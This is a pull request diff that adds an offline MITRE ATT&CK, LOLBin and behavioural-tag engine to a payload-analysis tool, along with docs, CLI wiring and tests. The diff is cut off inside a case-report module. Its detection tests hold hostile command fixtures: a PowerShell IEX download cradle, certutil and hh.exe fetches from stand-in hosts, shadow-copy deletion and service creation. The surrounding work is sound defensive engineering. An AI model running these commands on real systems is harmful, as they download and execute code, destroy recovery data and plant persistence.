### PR TITLE
Add deterministic Threat Intelligence Engine (Milestone 4)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -23,6 +23,13 @@ Threat Intelligence Engine:
   in JSON, DOT, and Mermaid outputs.
 - Ship the ATT&CK catalog subset as package data (wheel and sdist) and
   document the subsystem in `docs/THREAT_INTELLIGENCE.md`.
+- Wire `attack_ids` onto every built-in detection rule (TITAN-001…007) and
+  expose them on triggered detections, so fired rules corroborate ATT&CK
+  technique findings in the Threat Intelligence assessment. Rule packs can
+  declare the same optional `attack_ids` field per rule. The bundled catalog
+  gains T1059, T1218, and T1204.002 (catalog version
+  `enterprise-2026.1-titan-subset-r2`), and a test asserts every rule-declared
+  technique ID exists in the catalog.
 
 Detection quality:
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -23,6 +23,22 @@ Threat Intelligence Engine:
   in JSON, DOT, and Mermaid outputs.
 - Ship the ATT&CK catalog subset as package data (wheel and sdist) and
   document the subsystem in `docs/THREAT_INTELLIGENCE.md`.
+- Expand the bundled ATT&CK catalog subset from 23 to 48 techniques
+  (catalog version `enterprise-2026.1-titan-subset-r3`), covering discovery,
+  persistence, impact, defense-evasion, credential-access, and initial-access
+  techniques relevant to payload analysis, and pair the new entries with
+  producers: 14 new behavior rules (masquerading double-extensions, Unix
+  shell / Python inline execution, file deletion, registry modification,
+  service install/stop, recovery inhibition, network/user/process/account
+  discovery, credentials-in-files, cron) and 10 new LOLBin rules (MSBuild,
+  CMSTP, Odbcconf, Regsvcs, Regasm, Forfiles, Pcalua, hh.exe, at.exe,
+  crontab — the last three require unambiguous forms so everyday words like
+  "at" and "hh:mm" cannot fire them). Shadow-copy deletion evidence now
+  correctly maps to T1490 Inhibit System Recovery instead of T1486, and
+  `cipher /w:` moved to T1070.004 File Deletion. New catalog-integrity tests
+  assert IDs are unique and well-formed and that every technique referenced
+  by behavior rules, LOLBin rules, or detection `attack_ids` exists in the
+  catalog.
 - Wire `attack_ids` onto every built-in detection rule (TITAN-001…007) and
   expose them on triggered detections, so fired rules corroborate ATT&CK
   technique findings in the Threat Intelligence assessment. Rule packs can

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,28 @@
 
 ## Unreleased
 
+Threat Intelligence Engine:
+
+- Add a deterministic Threat Intelligence Engine (`titan_decoder/threat_intel/`)
+  that maps decoded evidence to a bundled offline MITRE ATT&CK subset,
+  identifies suspicious LOLBin usage (13 built-in rules), and emits behavioral
+  malware tags (downloader-like, script-stager-like, credential-theft-like,
+  ransomware-impact-like, host-discovery-like, living-off-the-land-chain) —
+  explicitly behavior descriptions, not malware-family attribution. Findings
+  carry per-item confidence, supporting evidence with node IDs, and
+  deterministic node → technique/LOLBin/tag relationships; the overall
+  assessment is versioned (`1.0`) with its own catalog version.
+- Wire the threat stage into the CLI pipeline after the Intelligence stage,
+  reusing the same canonical IOC summary (report + ingested evidence) so cited
+  indicators stay consistent across outputs. The result is attached to every
+  report as `threat_intelligence`.
+- Render a Threat Intelligence section (ATT&CK table, LOLBins, behavioral
+  tags) in Markdown and HTML case reports, and annotate graph exports:
+  graph-level threat metadata in JSON, plus per-node ATT&CK/LOLBin/tag labels
+  in JSON, DOT, and Mermaid outputs.
+- Ship the ATT&CK catalog subset as package data (wheel and sdist) and
+  document the subsystem in `docs/THREAT_INTELLIGENCE.md`.
+
 Detection quality:
 
 - Harden the LOLBin rule (TITAN-003): it now requires a LOLBin name to co-occur

--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -7,3 +7,4 @@ include SECURITY.md
 include requirements-optional.txt
 recursive-include docs *.md
 recursive-include docs *.json
+recursive-include titan_decoder *.json

--- a/README.md
+++ b/README.md
@@ -52,6 +52,7 @@ Titan is designed for repeatable analysis rather than opaque “best guess” de
 | Detection | Built-in correlation rules and optional rule packs |
 | Risk | Deterministic 0–100 risk assessment |
 | Intelligence | Classification, scored signals, artifact ranking, confidence, recommendation |
+| Threat intelligence | MITRE ATT&CK technique mapping, LOLBin identification, behavioral malware tags, node relationships |
 | Evidence | DNS, proxy, firewall, VPN, auth, DHCP, and generic CSV/JSONL ingestion |
 | Exports | JSON, JSONL, IOC formats, Markdown/HTML case reports, timelines, JSON/DOT/Mermaid graphs |
 | Operations | Interactive UI, batch mode, doctor check, local vault, offline guard |
@@ -148,8 +149,9 @@ The CLI is organized as explicit stages:
 6. Attach evidence.
 7. Run detections and risk scoring.
 8. Attach deterministic Intelligence.
-9. Run optional enrichment.
-10. Write reports, timelines, graphs, JSONL, and vault records.
+9. Attach deterministic Threat Intelligence (ATT&CK, LOLBins, behavioral tags).
+10. Run optional enrichment.
+11. Write reports, timelines, graphs, JSONL, and vault records.
 
 Common commands:
 
@@ -186,6 +188,7 @@ These components are related but intentionally separate:
 - **Detection rules** identify explicit patterns and correlations.
 - **Risk scoring** combines detections and report characteristics into an operational severity.
 - **Intelligence** creates an analyst-oriented classification, ordered signals, ranked artifacts, confidence, and recommendation.
+- **Threat Intelligence** maps evidence to a bundled offline MITRE ATT&CK subset, identifies LOLBin usage, and emits behavioral malware tags — see [docs/THREAT_INTELLIGENCE.md](docs/THREAT_INTELLIGENCE.md).
 
 The Intelligence object is deterministic and versioned. Its `1.0` contract is defined by:
 
@@ -228,6 +231,10 @@ When the report contains Intelligence data, exports include:
 - per-node priority annotations for ranked artifacts;
 - DOT legends and highlighted nodes;
 - Mermaid summary and priority classes.
+
+When it contains Threat Intelligence data, exports also include graph-level
+technique/tactic/LOLBin/tag metadata and per-node ATT&CK, LOLBin, and
+behavioral-tag annotations in JSON, DOT, and Mermaid outputs.
 
 Consumers that do not use Intelligence retain the previous graph structure.
 

--- a/docs/DETECTION_AND_RISK.md
+++ b/docs/DETECTION_AND_RISK.md
@@ -22,6 +22,10 @@ flowchart LR
 
 External rule packs should have stable IDs, explicit versions, bounded expressions, duplicate-ID validation, and fixtures. Treat rule packs as trusted configuration and review them before use.
 
+## ATT&CK metadata
+
+Every built-in rule carries static `attack_ids` — the MITRE ATT&CK technique IDs the rule indicates — and rule packs can declare the same field per rule. Triggered detections expose `attack_ids`, and the Threat Intelligence Engine consumes them as corroborating technique evidence (see [THREAT_INTELLIGENCE.md](THREAT_INTELLIGENCE.md)). A test asserts that every referenced ID exists in the bundled ATT&CK catalog, so rules and catalog cannot drift apart.
+
 ## Risk output
 
 Risk is deterministic and bounded. The CLI can fail a pipeline based on a configured minimum risk level. Unknown risk labels should not silently pass.

--- a/docs/DOCUMENTATION_INDEX.md
+++ b/docs/DOCUMENTATION_INDEX.md
@@ -13,6 +13,7 @@
 - [ARCHITECTURE.md](ARCHITECTURE.md) — subsystem boundaries and repository map.
 - [PIPELINES.md](PIPELINES.md) — end-to-end flow, decoder engine, and analyzer pipeline.
 - [INTELLIGENCE_LAYER.md](INTELLIGENCE_LAYER.md) — Intelligence contract, calibration, and integration.
+- [THREAT_INTELLIGENCE.md](THREAT_INTELLIGENCE.md) — ATT&CK mapping, LOLBins, and behavioral tags.
 - [DETECTION_AND_RISK.md](DETECTION_AND_RISK.md) — rules and operational severity.
 - [PLUGIN_API.md](PLUGIN_API.md) — plugin model and trust boundary.
 - [REPORT_SCHEMA.md](REPORT_SCHEMA.md) — report compatibility.

--- a/docs/REPORT_SCHEMA.md
+++ b/docs/REPORT_SCHEMA.md
@@ -12,6 +12,7 @@ Titan's primary JSON report is the contract between analysis, interpretation, ex
 - `detections` — triggered rules.
 - `risk_assessment` — score, level, and reasons.
 - `intelligence` — versioned analyst summary.
+- `threat_intelligence` — versioned ATT&CK techniques, LOLBins, behavioral tags, and relationships.
 - `enrichment` — optional provider output.
 
 ## Versioning

--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -15,13 +15,14 @@ This roadmap separates shipped features from planned work.
 - Intelligence in Markdown/HTML case reports
 - Intelligence annotations in JSON/DOT/Mermaid graph exports
 - Evidence-backed MITRE ATT&CK mappings, LOLBin identification, and behavioral malware tags (Threat Intelligence Engine)
+- ATT&CK technique metadata (`attack_ids`) on built-in detection rules and rule packs
 - Repeatable performance benchmarks with a committed baseline and CI regression gate
 
 ## Highest-value next work
 
 1. Strengthen rule packs with duplicate-ID checks, fixtures, and limits.
 2. Improve cross-source evidence correlation while preserving provenance.
-3. Expand the bundled ATT&CK catalog subset and per-rule technique metadata on built-in detections.
+3. Expand the bundled ATT&CK catalog subset.
 
 ## Optional local AI assistant
 

--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -16,13 +16,13 @@ This roadmap separates shipped features from planned work.
 - Intelligence annotations in JSON/DOT/Mermaid graph exports
 - Evidence-backed MITRE ATT&CK mappings, LOLBin identification, and behavioral malware tags (Threat Intelligence Engine)
 - ATT&CK technique metadata (`attack_ids`) on built-in detection rules and rule packs
+- Expanded 48-technique ATT&CK catalog subset with matching behavior and LOLBin rules
 - Repeatable performance benchmarks with a committed baseline and CI regression gate
 
 ## Highest-value next work
 
 1. Strengthen rule packs with duplicate-ID checks, fixtures, and limits.
 2. Improve cross-source evidence correlation while preserving provenance.
-3. Expand the bundled ATT&CK catalog subset.
 
 ## Optional local AI assistant
 

--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -14,13 +14,14 @@ This roadmap separates shipped features from planned work.
 - Intelligence v1.0 schema, compatibility tests, and calibration corpus
 - Intelligence in Markdown/HTML case reports
 - Intelligence annotations in JSON/DOT/Mermaid graph exports
+- Evidence-backed MITRE ATT&CK mappings, LOLBin identification, and behavioral malware tags (Threat Intelligence Engine)
+- Repeatable performance benchmarks with a committed baseline and CI regression gate
 
 ## Highest-value next work
 
-1. Add evidence-backed MITRE ATT&CK mappings.
-2. Add repeatable performance benchmarks before optimization.
-3. Strengthen rule packs with schema versions, duplicate-ID checks, fixtures, and limits.
-4. Improve cross-source evidence correlation while preserving provenance.
+1. Strengthen rule packs with duplicate-ID checks, fixtures, and limits.
+2. Improve cross-source evidence correlation while preserving provenance.
+3. Expand the bundled ATT&CK catalog subset and per-rule technique metadata on built-in detections.
 
 ## Optional local AI assistant
 
@@ -48,4 +49,4 @@ Potential backends include llama.cpp-compatible local runtimes and OpenAI-compat
 
 Recommended order:
 
-ATT&CK mapping → benchmarks → stable local-model interface → one tested backend → analyst chat UI.
+Stable local-model interface → one tested backend → analyst chat UI.

--- a/docs/THREAT_INTELLIGENCE.md
+++ b/docs/THREAT_INTELLIGENCE.md
@@ -58,6 +58,14 @@ malware-family attribution, which Titan cannot support from content alone.
 
 The ATT&CK catalog ships with the package and is loaded from disk; no network
 access is required or attempted, consistent with Titan's offline-first core.
+The catalog is a curated 48-technique subset of MITRE ATT&CK Enterprise
+focused on what payload analysis can actually evidence — execution,
+defense-evasion, persistence, discovery, credential-access, impact, C2, and
+delivery. It is the allow-list for every reported technique: catalog-integrity
+tests (`tests/test_threat_catalog.py`) assert that IDs are unique and
+well-formed and that every technique referenced by a behavior rule, LOLBin
+rule, or detection `attack_ids` exists in the catalog, so producers and
+catalog cannot drift apart.
 
 ## Tests
 

--- a/docs/THREAT_INTELLIGENCE.md
+++ b/docs/THREAT_INTELLIGENCE.md
@@ -33,8 +33,10 @@ The report field is `threat_intelligence`:
 
 Technique evidence comes from three sources: LOLBin findings, behavioral
 regex rules over node text, and `attack_ids`/`mitre_attack` metadata on
-triggered detections. Only technique IDs present in the bundled catalog are
-reported.
+triggered detections. Every built-in detection rule carries `attack_ids`,
+and rule packs can declare them per rule (see
+[DETECTION_AND_RISK.md](DETECTION_AND_RISK.md)). Only technique IDs present
+in the bundled catalog are reported.
 
 ## Behavioral tags are not attribution
 

--- a/docs/THREAT_INTELLIGENCE.md
+++ b/docs/THREAT_INTELLIGENCE.md
@@ -1,0 +1,67 @@
+# Threat Intelligence Engine
+
+The Threat Intelligence Engine maps decoded evidence to a versioned, offline
+MITRE ATT&CK subset, identifies suspicious LOLBin usage, and emits behavioral
+malware tags. It runs after detections and the Intelligence Layer, using the
+same canonical IOC summary (report indicators merged with ingested evidence
+indicators) so the indicators it cites stay consistent with every other
+output.
+
+Like the Intelligence Layer, it is deterministic: the same report always
+produces the same assessment, with stable ordering for techniques, tactics,
+findings, and relationships.
+
+## Report contract
+
+The report field is `threat_intelligence`:
+
+- `version` — engine contract version (`1.0`).
+- `catalog_version` — version of the bundled ATT&CK subset
+  (`titan_decoder/threat_intel/data/attack_catalog.json`).
+- `techniques` — ATT&CK technique findings, each with `technique_id`, `name`,
+  `tactics`, `confidence`, supporting `evidence`, and `source_rules`. Sorted
+  by descending confidence, then technique ID.
+- `tactics` — sorted union of tactics across all techniques.
+- `lolbins` — LOLBin findings with the executable, mapped technique IDs,
+  matched suspicious terms, node IDs, and confidence.
+- `malware_tags` — behavioral tags with category, reasons, node IDs, and
+  confidence.
+- `relationships` — deterministic node → technique/LOLBin/tag links with
+  scores.
+- `confidence` — overall assessment confidence in `[0, 1]`.
+- `summary` — one-line human-readable summary.
+
+Technique evidence comes from three sources: LOLBin findings, behavioral
+regex rules over node text, and `attack_ids`/`mitre_attack` metadata on
+triggered detections. Only technique IDs present in the bundled catalog are
+reported.
+
+## Behavioral tags are not attribution
+
+Malware tags describe observable behavior — `downloader-like`,
+`script-stager-like`, `credential-theft-like`, `ransomware-impact-like`,
+`host-discovery-like`, `living-off-the-land-chain` — and deliberately avoid
+malware-family attribution, which Titan cannot support from content alone.
+
+## Where it renders
+
+- **JSON report** — the `threat_intelligence` object described above.
+- **Case reports** (`--report-out`) — a "Threat Intelligence" section with an
+  ATT&CK table, LOLBins, and behavioral tags, in both Markdown and HTML.
+- **Graph exports** (`--graph`) — graph-level `threat_intelligence` metadata
+  in JSON exports, plus per-node ATT&CK/LOLBin/tag annotations in JSON, DOT,
+  and Mermaid outputs.
+
+## Offline by design
+
+The ATT&CK catalog ships with the package and is loaded from disk; no network
+access is required or attempted, consistent with Titan's offline-first core.
+
+## Tests
+
+```bash
+python -m pytest tests/test_threat_intelligence.py \
+  tests/test_threat_cli_wiring.py \
+  tests/test_threat_graphs.py \
+  tests/test_threat_case_reports.py
+```

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -62,6 +62,9 @@ version = { attr = "titan_decoder.__version__" }
 [tool.setuptools.packages.find]
 include = ["titan_decoder*"]
 
+[tool.setuptools.package-data]
+"titan_decoder.threat_intel" = ["data/*.json"]
+
 [tool.mypy]
 # Non-strict baseline (roadmap: "start non-strict, ratchet up"). Type errors
 # block merge in CI for every module NOT on the ratchet list below. The intent

--- a/tests/test_detection_attack_ids.py
+++ b/tests/test_detection_attack_ids.py
@@ -1,0 +1,93 @@
+"""ATT&CK technique metadata on detection rules.
+
+Built-in rules carry static `attack_ids`; triggered detections expose them so
+the Threat Intelligence Engine can use detections as corroborating technique
+evidence. The catalog-membership test keeps the rule metadata and the bundled
+ATT&CK subset from drifting apart.
+"""
+
+import json
+from pathlib import Path
+
+from titan_decoder.core.detection_rules import CorrelationRulesEngine
+from titan_decoder.threat_intel import ThreatIntelligenceEngine
+from titan_decoder.threat_intel.catalog import load_attack_catalog
+
+
+def test_every_builtin_rule_has_attack_ids():
+    engine = CorrelationRulesEngine()
+    builtin = [r for r in engine.rules if not hasattr(r, "source")]
+    assert builtin, "no built-in rules loaded"
+    for rule in builtin:
+        assert rule.attack_ids, f"{rule.rule_id} has no attack_ids"
+
+
+def test_builtin_attack_ids_exist_in_catalog():
+    by_id = load_attack_catalog()["by_id"]
+    engine = CorrelationRulesEngine()
+    for rule in engine.rules:
+        for technique_id in rule.attack_ids:
+            assert technique_id in by_id, (
+                f"{rule.rule_id} references {technique_id}, which is missing "
+                "from titan_decoder/threat_intel/data/attack_catalog.json"
+            )
+
+
+def test_triggered_detection_includes_attack_ids():
+    report = {
+        "nodes": [
+            {"depth": 0, "decoder_used": "Base64"},
+            {"depth": 1, "decoder_used": "Base64"},
+            {"depth": 2, "decoder_used": "Base64"},
+            {"depth": 3, "decoder_used": "Base64"},
+        ]
+    }
+    detections = CorrelationRulesEngine().evaluate_all(report, {})
+    deep_b64 = next(d for d in detections if d["rule_id"] == "TITAN-001")
+    assert deep_b64["attack_ids"] == ["T1027"]
+
+
+def test_pack_rule_attack_ids_flow_to_detections(tmp_path: Path):
+    pack = {
+        "schema_version": 1,
+        "pack": {"name": "Fixture Pack", "version": "0.1.0"},
+        "rules": [
+            {
+                "id": "FIX-001",
+                "name": "Contains marker",
+                "description": "fixture",
+                "severity": "low",
+                "type": "content_regex",
+                "pattern": "marker",
+                "attack_ids": ["T1027"],
+            }
+        ],
+    }
+    path = tmp_path / "pack.json"
+    path.write_text(json.dumps(pack))
+
+    report = {"nodes": [{"id": 0, "content_preview": "the marker string"}]}
+    detections = CorrelationRulesEngine([path]).evaluate_all(report, {})
+    fired = next(d for d in detections if d["rule_id"] == "FIX-001")
+    assert fired["attack_ids"] == ["T1027"]
+
+
+def test_detection_attack_ids_reach_threat_intelligence():
+    """End-to-end: a fired built-in rule corroborates technique findings."""
+    report = {
+        "nodes": [
+            {"id": 0, "depth": 0, "decoder_used": "Base64", "content_preview": ""},
+            {"id": 1, "depth": 1, "decoder_used": "Base64", "content_preview": ""},
+            {"id": 2, "depth": 2, "decoder_used": "Base64", "content_preview": ""},
+            {"id": 3, "depth": 3, "decoder_used": "Base64", "content_preview": ""},
+        ]
+    }
+    detections = CorrelationRulesEngine().evaluate_all(report, {})
+    assert any(d["rule_id"] == "TITAN-001" for d in detections)
+
+    result = ThreatIntelligenceEngine().analyze(report, detections=detections)
+    t1027 = next(
+        item for item in result["techniques"] if item["technique_id"] == "T1027"
+    )
+    assert "detection-metadata" in t1027["source_rules"]
+    assert any(ev.get("kind") == "detection" for ev in t1027["evidence"])

--- a/tests/test_threat_case_reports.py
+++ b/tests/test_threat_case_reports.py
@@ -1,0 +1,53 @@
+from titan_decoder.core.case_report import (
+    build_case_report,
+    to_html,
+    to_markdown,
+)
+
+
+THREAT = {
+    "version": "1.0",
+    "catalog_version": "fixture",
+    "techniques": [{
+        "technique_id": "T1059.001",
+        "name": "PowerShell",
+        "tactics": ["execution"],
+        "confidence": 0.9,
+        "evidence": [{"kind": "node", "node_id": 1}],
+        "source_rules": ["fixture"],
+    }],
+    "tactics": ["execution"],
+    "lolbins": [{
+        "name": "PowerShell",
+        "executable": "powershell.exe",
+        "technique_ids": ["T1059.001"],
+        "confidence": 0.9,
+        "node_ids": [1],
+        "matched_terms": ["-enc"],
+    }],
+    "malware_tags": [{
+        "tag": "script-stager-like",
+        "category": "execution",
+        "confidence": 0.8,
+        "reasons": ["encoded script"],
+        "node_ids": [1],
+    }],
+    "relationships": [],
+    "confidence": 0.9,
+    "summary": "fixture",
+}
+
+
+def test_case_report_renders_threat_intelligence():
+    case = build_case_report(
+        {"meta": {}, "node_count": 1, "threat_intelligence": THREAT},
+        None,
+        {},
+    )
+    markdown = to_markdown(case)
+    html = to_html(case)
+    assert "## Threat Intelligence" in markdown
+    assert "T1059.001" in markdown
+    assert "powershell.exe" in markdown
+    assert "script-stager-like" in markdown
+    assert "id='threat-intelligence'" in html

--- a/tests/test_threat_catalog.py
+++ b/tests/test_threat_catalog.py
@@ -1,0 +1,104 @@
+"""Bundled ATT&CK catalog integrity and rule/catalog sync.
+
+The catalog is the allow-list for every technique Titan can report: behavior
+rules, LOLBin rules, and detection `attack_ids` all resolve against it. These
+tests keep the catalog well-formed and guarantee no producer references a
+technique the catalog does not carry (which would be silently dropped).
+"""
+
+import re
+
+from titan_decoder.threat_intel import ThreatIntelligenceEngine
+from titan_decoder.threat_intel.catalog import load_attack_catalog
+from titan_decoder.threat_intel.lolbins import DEFAULT_LOLBIN_RULES
+
+_ID_PATTERN = re.compile(r"^T\d{4}(?:\.\d{3})?$")
+
+
+def test_catalog_ids_unique_and_well_formed():
+    techniques = load_attack_catalog()["techniques"]
+    ids = [item["id"] for item in techniques]
+    assert len(ids) == len(set(ids)), "duplicate technique IDs in catalog"
+    for item in techniques:
+        assert _ID_PATTERN.match(item["id"]), f"malformed ID: {item['id']}"
+        assert item["name"], f"{item['id']} has no name"
+        assert item["tactics"], f"{item['id']} has no tactics"
+        for tactic in item["tactics"]:
+            assert tactic == tactic.lower(), f"{item['id']}: tactic not lowercase"
+
+
+def test_subtechniques_have_parent_or_standalone_form():
+    """Every sub-technique ID must itself be well-formed against the base."""
+    by_id = load_attack_catalog()["by_id"]
+    for technique_id in by_id:
+        if "." in technique_id:
+            base = technique_id.split(".")[0]
+            assert _ID_PATTERN.match(base)
+
+
+def test_behavior_rule_techniques_exist_in_catalog():
+    by_id = load_attack_catalog()["by_id"]
+    for technique_id, _pattern, rule_name in ThreatIntelligenceEngine.BEHAVIOR_RULES:
+        assert technique_id in by_id, (
+            f"behavior rule '{rule_name}' references {technique_id}, missing "
+            "from attack_catalog.json"
+        )
+
+
+def test_lolbin_rule_techniques_exist_in_catalog():
+    by_id = load_attack_catalog()["by_id"]
+    for rule in DEFAULT_LOLBIN_RULES:
+        for technique_id in rule.technique_ids:
+            assert technique_id in by_id, (
+                f"LOLBin rule '{rule.name}' references {technique_id}, "
+                "missing from attack_catalog.json"
+            )
+
+
+def _techniques_for(preview: str) -> set:
+    report = {"nodes": [{"id": 0, "content_preview": preview}]}
+    result = ThreatIntelligenceEngine().analyze(report)
+    return {item["technique_id"] for item in result["techniques"]}
+
+
+def test_shadow_copy_deletion_maps_inhibit_recovery():
+    ids = _techniques_for("cmd /c vssadmin delete shadows /all /quiet")
+    assert "T1490" in ids
+    assert "T1486" not in ids  # encryption is not evidenced by shadow deletion
+
+
+def test_double_extension_maps_masquerading():
+    assert "T1036" in _techniques_for("open invoice.pdf.exe to view the document")
+
+
+def test_service_creation_maps_windows_service():
+    assert "T1543.003" in _techniques_for('sc create updater binPath= "c:\\u.exe"')
+
+
+def test_msbuild_lolbin_detected():
+    report = {
+        "nodes": [{"id": 0, "content_preview": "msbuild.exe payload.csproj /p:Cfg=1"}]
+    }
+    result = ThreatIntelligenceEngine().analyze(report)
+    lolbins = {item["executable"] for item in result["lolbins"]}
+    assert "msbuild.exe" in lolbins
+    assert "T1127.001" in {t["technique_id"] for t in result["techniques"]}
+
+
+def test_hh_and_at_require_exe_suffix():
+    benign = _techniques_for(
+        "The meeting runs 09:00-10:30 (hh:mm). Please look at the agenda."
+    )
+    assert "T1218.001" not in benign
+    assert "T1053.002" not in benign
+
+    fired = _techniques_for("hh.exe http://evil.test/a.chm && at.exe 12:00 payload")
+    assert "T1218.001" in fired
+    assert "T1053.002" in fired
+
+
+def test_benign_prose_produces_no_techniques():
+    assert _techniques_for(
+        "The quarterly budget report is attached for review. Totals were "
+        "confirmed by the finance team during the planning meeting."
+    ) == set()

--- a/tests/test_threat_cli_wiring.py
+++ b/tests/test_threat_cli_wiring.py
@@ -1,0 +1,15 @@
+from pathlib import Path
+
+
+def test_cli_wires_threat_stage_before_enrichment():
+    source = Path("titan_decoder/cli.py").read_text(encoding="utf-8")
+    main_source = source[source.index("def main():"):]
+    intelligence = main_source.index("attach_intelligence_stage(")
+    threat = main_source.index("attach_threat_intelligence_stage(", intelligence)
+    enrichment = main_source.index("run_enrichment_stage(", threat)
+    assert intelligence < threat < enrichment
+
+
+def test_graph_receives_threat_intelligence():
+    source = Path("titan_decoder/cli.py").read_text(encoding="utf-8")
+    assert 'threat_intelligence=report.get("threat_intelligence") or {}' in source

--- a/tests/test_threat_graphs.py
+++ b/tests/test_threat_graphs.py
@@ -1,0 +1,51 @@
+import json
+
+from titan_decoder.core.graph_export import GraphExporter
+
+
+THREAT = {
+    "version": "1.0",
+    "catalog_version": "fixture",
+    "techniques": [{
+        "technique_id": "T1059.001",
+        "name": "PowerShell",
+        "tactics": ["execution"],
+        "confidence": 0.9,
+        "evidence": [{"kind": "node", "node_id": 1}],
+        "source_rules": ["fixture"],
+    }],
+    "tactics": ["execution"],
+    "lolbins": [{
+        "name": "PowerShell",
+        "executable": "powershell.exe",
+        "technique_ids": ["T1059.001"],
+        "confidence": 0.9,
+        "node_ids": [1],
+        "matched_terms": ["-enc"],
+    }],
+    "malware_tags": [],
+    "relationships": [],
+    "confidence": 0.9,
+    "summary": "fixture",
+}
+
+
+def test_graph_json_contains_threat_annotations():
+    nodes = [{"id": 1, "parent": None, "method": "ANALYZE"}]
+    data = json.loads(
+        GraphExporter(nodes, threat_intelligence=THREAT).to_json()
+    )
+    assert data["metadata"]["threat_intelligence"]["technique_ids"] == [
+        "T1059.001"
+    ]
+    assert data["nodes"][0]["threat_intelligence"]["lolbins"] == [
+        "powershell.exe"
+    ]
+
+
+def test_dot_and_mermaid_include_threat_labels():
+    nodes = [{"id": 1, "parent": None, "method": "ANALYZE"}]
+    exporter = GraphExporter(nodes, threat_intelligence=THREAT)
+    assert "T1059.001" in exporter.to_dot()
+    assert "powershell.exe" in exporter.to_dot()
+    assert "T1059.001" in exporter.to_mermaid()

--- a/tests/test_threat_intelligence.py
+++ b/tests/test_threat_intelligence.py
@@ -1,0 +1,51 @@
+from titan_decoder.threat_intel import ThreatIntelligenceEngine
+
+
+def test_powershell_downloader_maps_attack_lolbin_and_tags():
+    report = {
+        "nodes": [{
+            "id": 3,
+            "content_preview": (
+                "powershell.exe -enc AAAA; "
+                "IEX(New-Object Net.WebClient).DownloadString"
+                "('https://example.test/a')"
+            ),
+        }],
+        "iocs": {"urls": ["https://example.test/a"]},
+    }
+    result = ThreatIntelligenceEngine().analyze(report)
+    ids = {item["technique_id"] for item in result["techniques"]}
+    assert {"T1059.001", "T1105", "T1027"} <= ids
+    assert result["lolbins"][0]["executable"] == "powershell.exe"
+    assert {"downloader-like", "script-stager-like"} <= {
+        item["tag"] for item in result["malware_tags"]
+    }
+    assert result["confidence"] > 0.5
+
+
+def test_threat_intelligence_is_deterministic():
+    report = {
+        "nodes": [
+            {"id": 1, "content_preview": "certutil -urlcache -f https://x.test/a a.bin"},
+            {"id": 2, "content_preview": "certutil -decode a.txt a.bin"},
+        ],
+        "iocs": {"urls": ["https://x.test/a"]},
+    }
+    engine = ThreatIntelligenceEngine()
+    assert engine.analyze(report) == engine.analyze(report)
+
+
+def test_detection_metadata_can_supply_attack_ids():
+    result = ThreatIntelligenceEngine().analyze(
+        {"nodes": []},
+        detections=[{"id": "fixture", "attack_ids": ["T1003"]}],
+    )
+    assert [item["technique_id"] for item in result["techniques"]] == ["T1003"]
+
+
+def test_clean_input_produces_empty_assessment():
+    result = ThreatIntelligenceEngine().analyze({"nodes": [], "iocs": {}})
+    assert result["techniques"] == []
+    assert result["lolbins"] == []
+    assert result["malware_tags"] == []
+    assert result["confidence"] == 0.0

--- a/titan_decoder/cli.py
+++ b/titan_decoder/cli.py
@@ -765,6 +765,22 @@ def attach_intelligence_stage(
     )
 
 
+def attach_threat_intelligence_stage(
+    args, report, detections, evidence_result
+) -> None:
+    """Attach deterministic ATT&CK, LOLBin, and behavioral mappings."""
+    from .core.ioc_export import build_ioc_summary
+    from .threat_intel import ThreatIntelligenceEngine
+
+    iocs = build_ioc_summary(report, None)
+    _merge_evidence_iocs(iocs, evidence_result)
+    report["threat_intelligence"] = ThreatIntelligenceEngine().analyze(
+        report,
+        iocs=iocs,
+        detections=detections,
+    )
+
+
 def run_enrichment_stage(args, config, report, evidence_result) -> None:
     """Optionally enrich IOCs (explicit opt-in; blocked by --offline)."""
     # Optional enrichment (explicit opt-in; blocked by --offline)
@@ -909,6 +925,7 @@ def write_outputs_stage(args, config, report, engine, detections, risk_assessmen
             graph_exporter = GraphExporter(
                 report.get("nodes") or [],
                 intelligence=report.get("intelligence") or {},
+                threat_intelligence=report.get("threat_intelligence") or {},
             )
             if args.graph_format == "dot":
                 graph_exporter.save_dot(args.graph)
@@ -1130,6 +1147,9 @@ def main():
     )
     attach_intelligence_stage(
         args, report, detections, risk_assessment, evidence_result
+    )
+    attach_threat_intelligence_stage(
+        args, report, detections, evidence_result
     )
     run_enrichment_stage(args, config, report, evidence_result)
     exit_code = write_outputs_stage(

--- a/titan_decoder/core/case_report.py
+++ b/titan_decoder/core/case_report.py
@@ -25,6 +25,9 @@ def build_case_report(
     """
     evidence = report.get("evidence") or {}
     intelligence = _normalize_intelligence(report.get("intelligence"))
+    threat_intelligence = _normalize_threat_intelligence(
+        report.get("threat_intelligence")
+    )
 
     recommendations = _recommendations(forensics, iocs)
     analyst_recommendation = intelligence.get("recommendation")
@@ -35,6 +38,7 @@ def build_case_report(
         "meta": report.get("meta", {}),
         "node_count": report.get("node_count", 0),
         "intelligence": intelligence,
+        "threat_intelligence": threat_intelligence,
         "iocs": iocs,
         "forensics": forensics or {},
         "evidence": {
@@ -60,6 +64,12 @@ def to_markdown(case: Dict[str, Any]) -> str:
     intelligence = _normalize_intelligence(case.get("intelligence"))
     if intelligence:
         lines.extend(_intelligence_markdown(intelligence))
+
+    threat = _normalize_threat_intelligence(
+        case.get("threat_intelligence")
+    )
+    if threat:
+        lines.extend(_threat_markdown(threat))
 
     if meta:
         lines.append("## Meta")
@@ -148,6 +158,9 @@ def to_html(case: Dict[str, Any]) -> str:
     recs = case.get("recommendations", [])
     ev = case.get("evidence") or {}
     intelligence = _normalize_intelligence(case.get("intelligence"))
+    threat = _normalize_threat_intelligence(
+        case.get("threat_intelligence")
+    )
 
     def esc(value: Any) -> str:
         return (
@@ -188,6 +201,7 @@ def to_html(case: Dict[str, Any]) -> str:
         )
 
     intelligence_html = _intelligence_html(intelligence, esc) if intelligence else ""
+    threat_html = _threat_html(threat, esc) if threat else ""
 
     evidence_html = "<p><em>No evidence ingested.</em></p>"
     if ev:
@@ -226,6 +240,7 @@ def to_html(case: Dict[str, Any]) -> str:
             "<body>",
             "  <h1>Titan Case Report</h1>",
             intelligence_html,
+            threat_html,
